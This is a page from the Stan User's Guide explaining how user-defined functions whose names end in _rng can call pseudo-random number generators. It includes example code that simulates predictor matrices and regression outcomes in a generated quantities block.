{"ft_lang_label":"__label__en","ft_lang_prob":0.8082892,"math_prob":0.99993265,"size":1918,"snap":"2021-43-2021-49","text_gpt3_token_len":706,"char_repetition_ratio":0.18652038,"word_repetition_ratio":0.34567901,"special_character_ratio":0.4337852,"punctuation_ratio":0.11883408,"nsfw_num_words":1,"has_unicode_error":false,"math_prob_llama3":0.9999914,"pos_list":[0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18],"im_url_duplicate_count":[null,5,null,3,null,3,null,3,null,5,null,3,null,3,null,3,null,3,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2021-10-16T18:24:21Z\",\"WARC-Record-ID\":\"<urn:uuid:a7b035a3-f995-47a6-a84a-6a3766c1d289>\",\"Content-Length\":\"111696\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:eeeac214-509a-4d57-9a1a-af07cb180a5c>\",\"WARC-Concurrent-To\":\"<urn:uuid:5ac3696d-523a-46ea-b408-4a413df04dc7>\",\"WARC-IP-Address\":\"172.67.209.153\",\"WARC-Target-URI\":\"https://scienceplusplus.com/graph-fx-to-fx-%C2%B1-a/\",\"WARC-Payload-Digest\":\"sha1:SHO3SQ5LFAKPOXC4NEESOMVNACHKSVX7\",\"WARC-Block-Digest\":\"sha1:I54KZV7XZSYVXTVWEGENLAASTPGSQPUF\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2021/CC-MAIN-2021-43/CC-MAIN-2021-43_segments_1634323584913.24_warc_CC-MAIN-20211016170013-20211016200013-00474.warc.gz\"}"}
https://stackoverflow.com/questions/45229159/easy-way-to-distinguish-between-0-and-false-in-a-dataframe-with-mixed-values
[ "# Easy way to distinguish between 0 and False in a dataframe with mixed values\n\nI have a column in my dataframe where the values take on either 1, 0, False but the rows with False or O are functionally different.\n\nI would therefore like to convert either the False or 0 values to something else\n\nWhat would be an good way to do this?\n\nUsing replace has not worked well\n\ndf[\"col_name\"] = df[\"col_name\"].replace(0,2) converts the False values too\n\nand\n\ndf[\"col_name\"] = df[\"col_name\"].replace(False,2) converts the 0 values too\n\n## 4 Answers\n\nYou can use mask to replace values with a boolean mask - the advantage of this solution is no original types are changed:\n\ndf = pd.DataFrame({'Col':[1, False, 0]})\n\ndf['Col'] = df['Col'].mask(df['Col'].astype(str) == '0', 2).replace(False, 3)\nprint (df)\nCol\n0 1\n1 3\n2 2\n\n\nSolution with Series.replace by dict, but first converting to str by astype works too, but generally it convert all values to str what with real data can be problem.\n\nd = {'0':'Zero', 'False':False}\ndf = df['Col'].astype(str).replace(d)\nprint (df)\n0 1\n1 False\n2 Zero\nName: Col, dtype: object\n\n\nI try create more general solution with map and checking bools by isinstance:\n\ndf = pd.DataFrame({'Col':[1, False, 0, True,5]})\nprint (df)\nCol\n0 1\n1 False\n2 0\n3 True\n4 5\n\nm = df['Col'].apply(lambda x: isinstance(x, bool))\ndf['Col'] = df['Col'].mask(m, df['Col'].map({False:2, True:3}))\n\nprint (df)\nCol\n0 1\n1 2\n2 0\n3 3\n4 5\n\n\nYou can convert to str type and then use df.str.replace:\n\nIn : df = pd.DataFrame({'Col':[1, False, 0]})\n\nIn : df.Col.astype(str).replace('0', 'Zero').replace('False', np.nan)\nOut:\n0 1\n1 NaN\n2 Zero\n\n\nLet's use astype:\n\ndf = pd.DataFrame({'Datavalue':[1,False,0]})\n\ndf.Datavalue.astype(str) == \"0\"\n\n\nOutput:\n\n0 False\n1 False\n2 True\nName: Datavalue, dtype: bool\n\ndf.loc[df.Datavalue.astype(str) == \"0\",'Datavalue'] = \"Zero\"\n\n\nOutput:\n\n Datavalue\n0 1\n1 False\n2 Zero\n\n\nUse jezrael's dataframe df\n\ndf = pd.DataFrame({'Col':[1, False, 0]})\n\n\nOption 1\nIf there are only three values, 1, 0, or False, then being of type bool is as good as being False\n\ndf.Col.mask(df.Col.apply(type) == bool, 2)\n\n0 1\n1 2\n2 0\nName: Col, dtype: object\n\n\nOption 2\nYou can use the python is operator\n\nFalse is 0\n\nFalse\n\n\nAnd use mask as we had before\n\ndf.mask(df.Col.apply(lambda x: x is False), 2)\n\n0 1\n1 2\n2 0\nName: Col, dtype: object\n\n• Then that throws it off. However, if OP is correct and only 3 values, then this works. – piRSquared Jul 21 '17 at 6:05" ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.74187,"math_prob":0.98362225,"size":438,"snap":"2021-21-2021-25","text_gpt3_token_len":121,"char_repetition_ratio":0.16129032,"word_repetition_ratio":0.0,"special_character_ratio":0.25570777,"punctuation_ratio":0.09090909,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.99768513,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2021-06-20T02:19:56Z\",\"WARC-Record-ID\":\"<urn:uuid:1cd8ec99-8d70-416a-bcc6-c4d679f39a87>\",\"Content-Length\":\"191678\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:7193f205-b008-40d7-babc-afbe1875b8c6>\",\"WARC-Concurrent-To\":\"<urn:uuid:0359afbf-a73f-476a-9f67-63772194791c>\",\"WARC-IP-Address\":\"151.101.65.69\",\"WARC-Target-URI\":\"https://stackoverflow.com/questions/45229159/easy-way-to-distinguish-between-0-and-false-in-a-dataframe-with-mixed-values\",\"WARC-Payload-Digest\":\"sha1:52NFVXHH4OZKVLCIBJEXR3XDOZK4235N\",\"WARC-Block-Digest\":\"sha1:35SUO3WKHDA2HVQXAWSEECYM4YNPUU2B\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2021/CC-MAIN-2021-25/CC-MAIN-2021-25_segments_1623487653461.74_warc_CC-MAIN-20210619233720-20210620023720-00606.warc.gz\"}"}
https://www.karnatakaeducation.org.in/KOER/en/index.php?title=Acceleration_due_to_Gravity&diff=prev&oldid=7187
[ "# Concept Map\n\nError: Mind Map file `Acceleration_due_to_gravity.mm` not found\n\n# Textbook\n\n## Useful websites\n\n1. The Value of \"g\". This is a good resource to study the variation of “g” at various distances above the Earth's atmosphere.\n2. This article examines the Galileo experiment and discusses if there are other possible explanations.\n\n# Teaching Outlines\n\n1. Gravitational force due to the Earth produces an acceleration in the objects. This is the force acting on a freely falling object.\n2. The value of acceleration is not dependent on the mass.\n3. All freely falling bodies gain same acceleration.\n\n## Concept #1 - Gravitational force due to the Earth produces an acceleration\n\n### Learning objectives\n\n1. To understand what causes an object to fall - the force and the acceleration\n2. Calculating the value of \"g\"\n\n### Notes for teachers\n\nThese are short notes that the teacher wants to share about the concept, any locally relevant information, specific instructions on what kind of methodology used and common misconceptions/mistakes.\n\n# Acceleration due to gravity\n\n### Free fall and acceleration due to gravity\n\nA freely falling body undergoes acceleration. This acceleration is caused by the gravitational force exerted by the larger mass of the Earth. This is referred to as acceleration due to gravity. The Earth also undergoes an acceleration due to the gravitational force exerted by the object. We do not notice it because of the mass of the Earth.\n\n### Activity No #1 - Freely falling Object\n\n• Estimated Time\n• Materials/ Resources needed\n• Prerequisites/Instructions, if any\n• Multimedia resources\n• Process (How to do the activity)\n• Developmental Questions (What discussion questions)\n• Evaluation (Questions for assessment of the child)\n• Question Corner\n\n### Activity No #2 – Observe a freely falling body\n\n• Estimated Time - 30 minutes\n• Materials/ Resources needed\n• Prerequisites/Instructions, if any\n1. Good quality clock with high precision of measurement\n2. This experiment will be difficult to measure\n• Multimedia resources\n• Process (How to do the activity)\n1. Ask a child to drop a piece of chalk from terrace\n2. Start the stop clock as soon as the child drops it.\n3. Put off the clock as soon as the chalk touches the ground, note down the time taken\n4. Repeat the same expt with a stone,& calculate the time\n• Developmental Questions (What discussion questions)\n1. What was the time taken?\n2. Was it the same?\n3. Why would it be so?\n4. 
Do the students relate it to the equations of motion they have studied?\n\nEvaluation (Questions for assessment of the child)\n\n• Question Corner\n\n## Concept #\n\n### Notes for teachers\n\nThese are short notes that the teacher wants to share about the concept, any locally relevant information, specific instructions on what kind of methodology is used and common misconceptions/mistakes.\n\n### Activity No #\n\n• Estimated Time\n• Materials/ Resources needed\n• Prerequisites/Instructions, if any\n• Multimedia resources\n• Process (How to do the activity)\n• Developmental Questions (What discussion questions)\n• Evaluation (Questions for assessment of the child)\n• Question Corner\n\n### Activity No #\n\n• Estimated Time\n• Materials/ Resources needed\n• Prerequisites/Instructions, if any\n• Multimedia resources\n• Process (How to do the activity)\n• Developmental Questions (What discussion questions)\n• Evaluation (Questions for assessment of the child)\n• Question Corner\n\n# Fun corner\n\nUsage\n\nCreate a new page and type {{subst:Science-Content}} to use this template\n\n# Weight\n\n## Concept flow\n\n• Every particle has mass; weight is a force acting on a mass due to the gravitational pull.\n• This force experienced by an object due to the gravitational pull of the Earth is what we call the weight. Weight is nothing but the force exerted on a mass due to the gravitational pull of the Earth.\n\n### How do we perceive this weight?\n\nWhen you stand on a surface, the force of the Earth's gravity is acting upon you downwards and there is a normal force exerted by the surface on which you stand. Since you stand on a firm surface and there is no acceleration, the normal force is equal to the gravitational force and this is equal to mg. If an object is suspended from a spring, the gravitational force will be balanced by the tension force in the spring.\n\nWeight is that supporting force felt by an object in equilibrium; this opposes and balances the gravitational pull of the Earth. Thus, humans experience their own body weight as a result of this supporting force, which results in a normal force applied to a person by the surface of a supporting object, on which the person is standing or sitting. In the absence of this force, a person would be in free-fall, and would experience weightlessness. It is the transmission of this reaction force through the human body, and the resultant compression and tension of the body's tissues, that results in the sensation of weight.\n\nWhen an object is in equilibrium, it only experiences the gravitational force and the restoring (supporting) force. Weight is mass multiplied by the acceleration due to gravity.\n\nMeasured weight can change:\n\n• when acceleration due to gravity changes\n• when the object is accelerating (non-inertial frame), as in the short sketch below\n\nWhen used to mean force, the magnitude of weight (a scalar quantity), often denoted by an italic letter W, is the product of the mass, m, of the object and the magnitude of the local gravitational acceleration g; thus: W = mg. When considered a vector, weight is often denoted by a bold letter W. 
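A small numerical sketch (plain Python; the 70 kg mass and the lift accelerations are made-up illustrative numbers) of the two bullets above — the scale reading is the normal force, so it changes when the support accelerates even though mg does not:

m, g = 70.0, 9.8              # kg, m/s^2 (illustrative values)
W = m * g                     # true weight, about 686 N
for a in (0.0, 2.0, -2.0):    # lift at rest, accelerating up, accelerating down
    N = m * (g + a)           # reading of a scale in the lift (the normal force)
    print(a, W, N)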
The unit of measurement for weight is that of force, which in the International System of Units (SI) is the newton.\n\nFor example, an object with a mass of one kilogram has a weight of about 9.8 newtons on the surface of the Earth, about one-sixth as much on the Moon, and very nearly zero when in deep space far away from all bodies imparting gravitational influence.\n\n## Earlier concepts of weight\n\nConcepts of heaviness (weight) and lightness (levity) date back to the ancient Greek philosophers. These were typically viewed as inherent properties of objects. Plato described weight as the natural tendency of objects to seek their kin. To Aristotle weight and levity represented the tendency to restore the natural order of the basic elements: air, earth, fire and water. He ascribed absolute weight to earth and absolute levity to fire. Archimedes saw weight as a quality opposed to buoyancy, with the conflict between the two determining if an object sinks or floats. The first operational definition of weight was given by Euclid, who defined weight as: \"weight is the heaviness or lightness of one thing, compared to another, as measured by a balance.\"\n\n## Satellites and weightlessness\n\nIt is a very common misconception that when astronauts are in orbit they are weightless because they are somehow far enough from the earth that the force of earth's gravity does not pull on them. This is totally incorrect. If they were that far away, earth's gravity would not pull on the shuttle either and it would be impossible for it to be in orbit around the earth.\n\nGravity (a force we call weight) is actually responsible for keeping the spacecraft and the astronaut in orbit around the earth. Gravity is still pulling on the astronaut. The feeling of weightlessness is no different than when in free fall. What they are not experiencing is the normal force, which is the opposing force. When that force is gone, we say we feel \"weightless.\" In fact, whenever a person is in freefall they feel weightless even though gravity is still causing them to have weight. While in orbit, the space shuttle does not have to push on the astronaut (or anything else in the cabin) to keep him up. The space shuttle and the astronaut are in a constant state of freefall around the earth.\n\n# Significance of the gravitational force\n\n## Discovery of planets\n\nAccurate measurements of the orbits of the planets indicated that they did not precisely follow Kepler's laws. Slight deviations from perfectly elliptical orbits were observed. Newton was aware that this was to be expected from the Law of Universal Gravitation. The derivation of perfectly elliptical orbits ignores the forces due to the other planets. These deviations, called perturbations, were observed and led to the discovery of Neptune and Pluto. Planets around distant stars were also inferred from the regular wobble of each star due to the gravitational attraction of the revolving planet.\n\n## Ocean tides\n\nOcean tides are caused by differences in the gravitational pull between the Moon and the Earth on the opposite sides of the Earth. Gravitational force is stronger on the side of the Earth nearer to the Moon and is weaker on the side of the Earth farther from the Moon. 
The bulge that is caused in the Earth's oceans due to this gravitational pull results in two sets of tides on the Earth.\n\n### Activity 3: Thought Experiment\n\nObjective: To understand the nature of gravitational force\n\nProcedure:\n\nAsk the children to think about what will happen if we had a hollow tunnel running through the centre of the Earth and we dropped a ball into it. What will happen to the ball?\n\n# Projectile and Satellite Motion\n\n## Concept flow\n\n• The projectile motion of a thrown body is due to the gravitational force.\n• Satellites are projectiles that are continuously falling in orbit around planets\n\nLet us study this picture below and analyze what happens in each of the cases.\n\nIn the first case, the ball is just dropped from the cliff and it falls down in a straight line, subject to the force of gravity. In the second and third instances, the ball is thrown upwards, reaches a certain height and still falls down. In the third case, the ball covers a horizontal range as well.\n\nIn all these cases, gravity is the only force acting. Without gravity, we could throw a rock upwards at an angle and it would follow a straight-line path. Because of gravity, however, the path curves.\n\nSuch an object, which is thrown/projected and continues its motion on its own inertia, is called a projectile. A projectile will have two components to its velocity – the horizontal and the vertical. The horizontal component is similar to an object rolling on a plane/ along a straight line. The vertical component of the velocity is subject to the acceleration due to gravity. A projectile moves horizontally as it moves downwards or upwards.\n\nImagine throwing a ball straight up. It will fall down to the same place. In this case the ball has a velocity in the vertical direction which changes with time as the force due to gravity causes an acceleration in the downward direction all the time. But suppose one were to throw a ball with only a horizontal velocity. The ball will now move with a velocity that has two components to it - one the horizontal velocity which remains unchanged as long as there is no force such as air resistance acting on it and a vertical velocity that is continually changing. This vertical velocity starts at zero - we threw the ball horizontally - and keeps increasing with an acceleration g.\n\nThe resultant velocity is a combination of the two. This is what causes objects to follow a parabolic path when they are thrown with a combination of horizontal and vertical velocities. The greater the horizontal component the farther the ball will travel. For short distances, and small velocities, the curvature of the Earth will make no difference. But suppose that we throw it so hard that the horizontal distance is very large and we can no longer ignore the curvature of the Earth?\n\nSuppose we throw it so hard that the ball will continue to fall but will never reach the ground - the Earth's surface curves away beneath the ball as fast as the ball falls towards it? Then the ball will become a satellite! It will move round and round the Earth - constantly falling but never reaching the ground!\n\nThe satellite and everything in it are constantly falling towards the Earth but will never reach it. Since they are all falling with the same velocity, the satellite does not exert any force on the objects or people inside. The people inside, therefore, feel weightless. Remember, we have a sense of weight because of the Normal force. 
Here the Normal force is zero and so we feel weightless.\n\nThis is very similar to the sense of loss of weight in a lift that is accelerating downwards - except that here the acceleration is the acceleration due to gravity.\n\n## Satellite\n\nAn Earth satellite is simply a projectile that falls around the Earth rather than into it. That means the horizontal falling distance matches the Earth's curvature. Geometrically, the curvature of the Earth's surface is such that it drops a vertical distance of about 5 metres for every 8000 metres along a tangent to the surface.\n\nTherefore, if we throw a rock or a ball at a high enough speed (about 8 km/s, or roughly 29000 km/h), it would follow the curvature of the Earth. But at this speed, atmospheric friction (due to air drag) would burn up everything. This is why satellites are launched at an altitude high enough for the air drag to be negligible.\n\nSatellite motion was understood by Newton, who reasoned that the Moon was simply a projectile that was circling the Earth.\n\n### Activity 4 - Demonstration of satellite motion using simulation\n\nThe following simulation can illustrate how satellite motion takes place.\n\n# Kepler's Laws\n\n## Concept flow\n\n• The key concept to understand here is that gravitational forces play an important role in planetary motion.\n• Three laws of planetary motion that describe the motion of the planets have been postulated based on detailed astronomical observations.\n\n## Laws of Planetary Motion\n\nWe now know that satellites are continually falling towards the Earth, following a curved path that bends around the Earth instead of reaching its surface. The Moon is just such a satellite that moves around the Earth. In a similar way, all the planets that move around the Sun are satellites of the Sun. The motion described in such a situation is not strictly circular - it is elliptical.\n\nJohannes Kepler, working with data painstakingly collected by Tycho Brahe without the aid of a telescope, developed three laws which described the motion of the planets across the sky.\n\n1. The Law of Orbits: All planets move in elliptical orbits, with the sun at one focus.\n\n2. The Law of Areas: Each planet moves so that an imaginary line drawn from the Sun to the planet sweeps out equal areas in equal periods of time.\n\n3. The Law of Periods: The square of the period of any planet is proportional to the cube of the semimajor axis of its orbit.\n\nKepler's laws were derived for orbits around the sun, but they apply to satellite orbits as well.\n\n### The Law of Orbits\n\nAll planets move in elliptical orbits, with the sun at one focus. An ellipse is a closed curve such that the sum of the distances from any point P on the curve to two fixed points (called the foci, F1 and F2) remains constant.\n\nOrbit eccentricity\n\nThe semi major axis of the ellipse is a and represents the planet's average distance from the Sun. The eccentricity, “e”, is defined so that “ea” is the distance from the centre to either focus. A circle is a special case of an ellipse where the two foci coincide. The Earth and most of the other planets have nearly circular orbits. 
For Earth, “e” = 0.017.\n\n### The Law of Equal Areas\n\nKepler's second law states that each planet moves so that an imaginary line drawn from the Sun to the planet sweeps out equal areas in equal periods of time.\n\nThis can be shown to be true using the law of conservation of angular momentum.\n\nIf “v” is the velocity of the planet, in time “dt” the planet moves a distance vdt and sweeps out an area equal to the area of a triangle of base “r” and altitude vdt sinα.\n\nHence dA = ½ r (v dt sinα)\n\ndA/dt = ½ r v sinα\n\nThe magnitude of the angular momentum of the planet about the Sun is L = mvr sinα.\n\ndA/dt = ½ L/m\n\nBecause the angular momentum is conserved, the rate of change of area covered is constant. This means that the planets move with different velocities depending upon their position in the orbits.\n\n### The Law of Periods\n\nThe ratio of the squares of the periods of any two planets revolving about the Sun is equal to the ratio of the cubes of their semi-major axes.\n\nCan you derive this?\n\nG m1 Ms / r1² = m1 v1² / r1\n\nv1 = 2π r1 / T1\n\nSubstituting and rearranging, we get\n\nT1² / r1³ = 4π² / (G Ms)\n\nDeriving this for another planet, we can arrive at the third law.\n\n5. www.hyperphysics.com - From Classical Mechanics to General Relativity - This is a good description of the geometry of Newtonian gravity and how to move from classical mechanics to relativity.\n\n8. http://www.physicsclassroom.com/Class/circles/U6L4b.cfm - This website describes the mathematics of orbital motion.\n\n# Keywords\n\nMass, Inertial, Gravitational, Force field, Universal law of gravitation, Acceleration due to gravity, “g”, weight, weightlessness" ]
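A minimal numerical sketch in Python (the planet data and constants are rounded textbook values, not taken from this page) checking the two claims above: T²/a³ comes out the same for different planets and equals 4π²/(G·Ms), and the speed needed to orbit just above the Earth's surface is about 8 km/s.

import math

G = 6.674e-11                 # gravitational constant, N m^2 kg^-2
M_sun = 1.989e30              # kg
M_earth = 5.972e24            # kg
R_earth = 6.371e6             # m

# Kepler's third law: T^2 / a^3 is the same for every planet
planets = {"Earth": (1.496e11, 3.156e7), "Mars": (2.279e11, 5.94e7)}   # (a in m, T in s)
for name, (a, T) in planets.items():
    print(name, T**2 / a**3)                            # ~2.97e-19 s^2 m^-3 for both
print("4*pi^2/(G*Ms) =", 4 * math.pi**2 / (G * M_sun))  # the same value

# Circular-orbit speed just above the Earth's surface (the ~8 km/s quoted above)
v = math.sqrt(G * M_earth / R_earth)
print("orbital speed =", round(v), "m/s")                # ~7900 m/s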
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.9164175,"math_prob":0.9033593,"size":18329,"snap":"2023-14-2023-23","text_gpt3_token_len":3938,"char_repetition_ratio":0.1458663,"word_repetition_ratio":0.11269473,"special_character_ratio":0.20792188,"punctuation_ratio":0.097473994,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9797689,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2023-06-01T11:26:55Z\",\"WARC-Record-ID\":\"<urn:uuid:7d2e780d-61dc-400f-b065-30e8c661c2ae>\",\"Content-Length\":\"72863\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:c3ebf4b8-8355-4906-b5cd-bf173bd8b0fa>\",\"WARC-Concurrent-To\":\"<urn:uuid:a5a5c06b-88b3-4339-87bc-2dec67078129>\",\"WARC-IP-Address\":\"43.254.42.216\",\"WARC-Target-URI\":\"https://www.karnatakaeducation.org.in/KOER/en/index.php?title=Acceleration_due_to_Gravity&diff=prev&oldid=7187\",\"WARC-Payload-Digest\":\"sha1:J7CMCZT2P3BYJ47HVGJTUGPGY3OW4LKQ\",\"WARC-Block-Digest\":\"sha1:6BDY5NEMSK6PQPT27QP4HS65P3ZZ4RKY\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2023/CC-MAIN-2023-23/CC-MAIN-2023-23_segments_1685224647810.28_warc_CC-MAIN-20230601110845-20230601140845-00736.warc.gz\"}"}
http://yoric.mit.edu/DAEPACK/Overview
[ "# Overview\n\nDAEPACK is a software library consisting of components for performing symbolic and numeric computations on general Fortran-90 models.\n\nDAEPACK is an acronym for Differential-Algebraic Equation Package, however, its scope is not limited to the analysis of DAEs. The components of DAEPACK can be used by the modeler to provide the necessary information (e.g., sparsity pattern, analytical derivatives, hidden discontinuities, etc.) required when using state-of-the-art algorithms to solve a wide variety of numerical calculations, including the solution of nonlinear algebraic equations, mixed integer nonlinear optimization, parameter estimation, and many others. DAEPACK components are designed to be mixed, matched, and combined with third party numerical components to solve any particular problem at hand. What distinguishes DAEPACK from other numerical libraries (e.g., LINPACK or ODEPACK) is the set of symbolic components that automatically generate the information required to perform the numerical calculation efficiently, robustly, and correctly using state-of-the-art numerical algorithms. This information, which would otherwise have to be provided by the modeler (a very tedious, time consuming, and error prone task), is exploited in a suite of DAEPACK numeric components.\n\nDAEPACK can be used in several different ways. First, DAEPACK can be used standalone, where the modeler assembles the required symbolic and numeric components of DAEPACK, combined with the original model and other numerical routines, and solves a particular problem. The figure below demonstrates how DAEPACK can be used to assist the modeler in performing a dynamic calculation involving a DAE model.", null, "The user provides DAEPACK with a set FORTRAN files containing the model equations. This model is translated and a set of new FORTRAN files are generated, providing the sparsity pattern, analytical derivatives, and a discontinuity-locked version of the the original model. The sparsity pattern can be used with a variety of structural algorithms, providing valuable information about the model. For example, the DAE can be examined to determine if it is high index. Current work involves the development of algorithms for the automatic index reduction of general FORTRAN models. The code generated by the symbolic components are used by a variety of DAEPACK numerical components used in this example. For example, the sparsity pattern and analytical derivatives are used by the block solver component to obtain a consistent set of initial conditions. The block solver, described in the numeric components section of the Features page, often dramatically improves the performance of the consistent initial condition calculation. The sparsity pattern, analytical derivatives, and discontinuity-locked model are used by a set of dynamic calculation components to perform the desired numerical calculation.\n\nDAEPACK is also used with the equation-oriented process simulator ABACUSS II. The figure below contains a diagram showing the architecture of ABACUSS II.", null, "ABACUSS II uses DAEPACK to perform the required numerical calculations. In addition,DAEPACK is used to properly incorporate FORTRAN code, such as physical property subroutines and legacy models, into an overall model. FORTRAN code is no longer treated as ablack box -- DAEPACK is used to generate all of the symbolic information so that these external models are treated exactly the same way as the part of the model written in ABACUSS II's input language. 
This capability allows the modeler to formulate heterogeneous models, where different parts of the model are expressed in various forms using the appropriate language for a particular task.\n\nA third use of DAEPACK is as an enabling technology for CAPE-OPEN components. The EU-sponsored CAPE-OPEN committee and subsequent Global CAPE-OPEN committee are defining important interface standards for process simulation tools that will greatly improve the flexibility of modern simulation environments. The vision is that tools (e.g., physical property routines, process unit operation models, numerical routines, etc.) written in-house and combined with the products of several third-party vendors can be combined seamlessly to perform the desired calculation. The disadvantage of this, however, is that it forces the modeler developing CAPE-OPEN compliant components to concentrate on issues other than writing a correct model. This is particularly true of the Equation-Set Object which encapsulates\n\nthe variables, equations, and other information required when performing dynamic calculations within the CAPE-OPEN framework. The current specification requires the modeler to provide access to the equation structure (dimensions and sparsity pattern), partial derivatives, and variable values. If the system involves discontinuities then the modeler must represent the discontinuous model equations as a State-Transition Network. This, in particular, can be quite problematic since the number of discrete modes may become extremely large even for small problems. Fulfillment of these requirements places a tremendous burden on the modeler. Fortunately, DAEPACK can be used to automatically generate the additional information required to satisfy the CAPE-OPEN specifications. As shown in the figure below, the modeler concentrates on writing a correct model and DAEPACK takes care of the rest.", null, "The CAPE-OPEN committee is defining important interface standards that will greatly increase the flexibility of modern process modeling environments, however, without enabling technologies, such as DAEPACK, these endeavors will never reach their true potential.\n\n#### Heterogeneous model formulation\n\nThe input translation step of DAEPACK was designed from the start to be a flexible as possible, readily extensible to translating models described using languages other than Fortran-90. This capability, within the equation-oriented framework described above, allows the modeler to be very flexible in the model representation. The best model representation can be selected for different portions of the model and, using DAEPACK, the overall model can be solved in a consistent, correct manner." ]
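The sparsity-pattern and analytical-derivative information described above can be pictured with a small sketch. This is not DAEPACK and not Fortran — just a hypothetical three-equation model written in Python/SymPy to show the kind of output (an occurrence matrix plus exact partial derivatives) that DAEPACK generates automatically from Fortran-90 source.

import sympy as sp

x, y, z = sp.symbols("x y z")
# A toy residual system f(x, y, z) = 0 standing in for a user's model equations
f = sp.Matrix([x**2 + sp.sin(y),
               y - z,
               sp.exp(z) - 1])

J = f.jacobian([x, y, z])                      # analytical partial derivatives
sparsity = J.applyfunc(lambda d: int(d != 0))  # which equation involves which variable

print(sparsity)   # Matrix([[1, 1, 0], [0, 1, 1], [0, 0, 1]])
print(J)          # Matrix([[2*x, cos(y), 0], [0, 1, -1], [0, 0, exp(z)]])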
[ null, "http://yoric.mit.edu/sites/default/files/images/daepack.inline.gif", null, "http://yoric.mit.edu/sites/default/files/images/abacussII.inline.gif", null, "http://yoric.mit.edu/sites/default/files/images/eso.inline.gif", null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.8893131,"math_prob":0.91886485,"size":6176,"snap":"2019-51-2020-05","text_gpt3_token_len":1160,"char_repetition_ratio":0.14063513,"word_repetition_ratio":0.0045095826,"special_character_ratio":0.16839378,"punctuation_ratio":0.10516066,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.95636994,"pos_list":[0,1,2,3,4,5,6],"im_url_duplicate_count":[null,1,null,1,null,1,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2019-12-15T07:21:25Z\",\"WARC-Record-ID\":\"<urn:uuid:88f1337d-7d99-4c45-b91c-f52e1866af80>\",\"Content-Length\":\"35837\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:16cdf8f3-6676-4127-b511-712944c9dcee>\",\"WARC-Concurrent-To\":\"<urn:uuid:a2f12d44-31f0-4d50-8893-ae75bed409c8>\",\"WARC-IP-Address\":\"18.9.61.41\",\"WARC-Target-URI\":\"http://yoric.mit.edu/DAEPACK/Overview\",\"WARC-Payload-Digest\":\"sha1:QK4YVDS6KMGH5UBA567HAQAR3NSF6TC5\",\"WARC-Block-Digest\":\"sha1:3YCFITFSSEPZMNBTV7VFEY7ZUTOEFIZD\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2019/CC-MAIN-2019-51/CC-MAIN-2019-51_segments_1575541307797.77_warc_CC-MAIN-20191215070636-20191215094636-00383.warc.gz\"}"}
https://mc-stan.org/docs/2_18/stan-users-guide/functions-acting-as-random-number-generators.html
[ "## 17.4 Functions Acting as Random Number Generators\n\nA user-specified function can be declared to act as a (pseudo) random number generator (PRNG) by giving it a name that ends in _rng. Giving a function a name that ends in _rng allows it to access built-in functions and user-defined functions that end in _rng, which includes all the built-in PRNG functions. Only functions ending in _rng are able access the built-in PRNG functions. The use of functions ending in _rng must therefore be restricted to transformed data and generated quantities blocks like other PRNG functions; they may also be used in the bodies of other user-defined functions ending in _rng.\n\nFor example, the following function generates an $$N \\times K$$ data matrix, the first column of which is filled with 1 values for the intercept and the remaining entries of which have values drawn from a standard normal PRNG.\n\nmatrix predictors_rng(int N, int K) {\nmatrix[N, K] x;\nfor (n in 1:N) {\nx[n, 1] = 1.0; // intercept\nfor (k in 2:K)\nx[n, k] = normal_rng(0, 1);\n}\nreturn x;\n}\n\nThe following function defines a simulator for regression outcomes based on a data matrix x, coefficients beta, and noise scale sigma.\n\nvector regression_rng(vector beta, matrix x, real sigma) {\nvector[rows(x)] y;\nvector[rows(x)] mu;\nmu = x * beta;\nfor (n in 1:rows(x))\ny[n] = normal_rng(mu[n], sigma);\nreturn y;\n}\n\nThese might be used in a generated quantity block to simulate some fake data from a fitted regression model as follows.\n\nparameters {\nvector[K] beta;\nreal<lower=0> sigma;\n...\ngenerated quantities {\nmatrix[N_sim, K] x_sim;\nvector[N_sim] y_sim;\nx_sim = predictors_rng(N_sim, K);\ny_sim = regression_rng(beta, x_sim, sigma);\n}\n\nA more sophisticated simulation might fit a multivariate normal to the predictors x and use the resulting parameters to generate multivariate normal draws for x_sim." ]
[ null ]
